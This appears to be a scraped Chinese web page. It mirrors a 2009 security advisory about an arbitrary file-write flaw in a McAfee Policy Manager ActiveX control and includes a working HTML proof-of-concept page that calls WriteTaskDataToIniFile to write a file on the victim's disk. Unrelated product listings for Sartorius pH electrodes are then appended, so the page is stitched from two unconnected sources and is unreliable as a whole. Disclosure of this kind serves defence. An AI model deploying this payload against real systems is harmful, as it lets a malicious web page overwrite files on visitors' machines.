McAfee 3.6.0.608 naPolicyManager.dll ActiveX 任意数据写入漏洞

12888411

GOODFELLAS Security Research TEAM
http://goodfellas.shellcode.com.ar
Greetings to str0ke


McAfee, Inc. 3.6.0.608 Policy Manager naPolicyManager.dll Arbitrary Data Write
==============================================================================

Internal ID: VULWAR20090616.
-----------


Introduction
------------

naPolicyManager.dll is a library included in the Program Mc Afee inc.


Tested In
---------

- Windows XP SP1/SP2 french/english with IE 6.0 / 7.0.


Summary
-------

The WriteTaskDataToIniFile method doesn't check if it's being called from the
application or from a malicious user. A Remote Attacker could craft a
html page and overwrite arbitrary files in a system.


Impact
------

The vulnerability could allow malicious users to write arbitrary data on a
vulnerable system that uses this software.


Workaround
----------

- Activate the Kill bit zero in the clsid corresponding to the software.
- Unregister naPolicyManager.dll using regsvr32.


Timeline
--------

July 16 2009 -- Bug Discovery.
July 16 2009 -- POC published.


Credits
-------

* callAX <bemariani@gmail.com>


Technical Details
-----------------

WriteTaskDataToIniFile method receives one argument filename in this format
"c:\path\file".


Proof of Concept
---------------

<HTML>
<BODY>
<object id=ctrl classid="clsid:{04D18721-749F-4140-AEB0-CAC099CA4741}"></object>
<SCRIPT>
function Do_1t()
{
   File = "C:\b00t.ini"
   ctrl.WriteTaskDataToIniFile(File)
}
</SCRIPT>
<input language=JavaScript onclick=Do_1t() type=button value="P0c">
</BODY>
</HTML>

红之顺

PY-P10/DOC-pH电极

	产品型号：	PY-P10/DOC
	产品名称：	pH电极
	产品品牌：	赛多利斯SARTORIUS
	产品价格：	2170 RMB
	产品特点：	电化学分析用电极

PH复合电极和FETpH电极
推荐用于	PH范围	电极体结构	内置温度 传感器	温度范围	订货号
所有常规测量	0--14	塑料体; 电解液: KCl3mol/l	有	-5℃--80℃	PY-P10
所有PH测量；兼容TRIS	0—14	玻璃体；电解液: KCl3mol/l	有	-5℃--100℃	PY-P11
所有常规测量	0—14	塑料体；凝胶	有	0℃--100℃	PY-AS1
所有常规测量	0--14	玻璃体；电解液:KCl3mol/l	没有	0℃--100℃	PY-AS12
低离子活度测量	0--14	玻璃体；电解液:KCl3mol/l	没有	0℃--100℃	PY-PW
所有PH测量；兼容TRIS	0—14	玻璃体；电解液: KCl3mol/l	没有	-5℃--100℃	PY-P21
少量样品； 窄口样品容器	0--14	微电极 （长度110mm；直径5mm）电解液:KCl3mol/l	没有	-5℃--60℃	PY-P22
小体积或面积的PH测量， 如肉、乳酪、皮等	2—13	平头电极； 玻璃体、凝胶	没有	-5℃--50℃	PY-P23
困难的PH测量， (适用于高度粘性样品或低离子活度样品)	0--14	高效电极； 塑料体 电解液: KCl3mol/l	没有	-5℃--100℃	PY-P24
食品生产(无玻璃),恶劣环境,用于专业型电化学分析仪	0--14	FET电极（直径9.5mm）、 凝胶	有	0℃--60℃	PY-P30
食品生产(无玻璃),恶劣环境,用于基础型电化学分析仪	0--14	FET电极（直径9.5mm）、 凝胶	有	0℃--60℃	PY-P31

公司：上海秦迈仪器有限公司
销售总机：021-56710030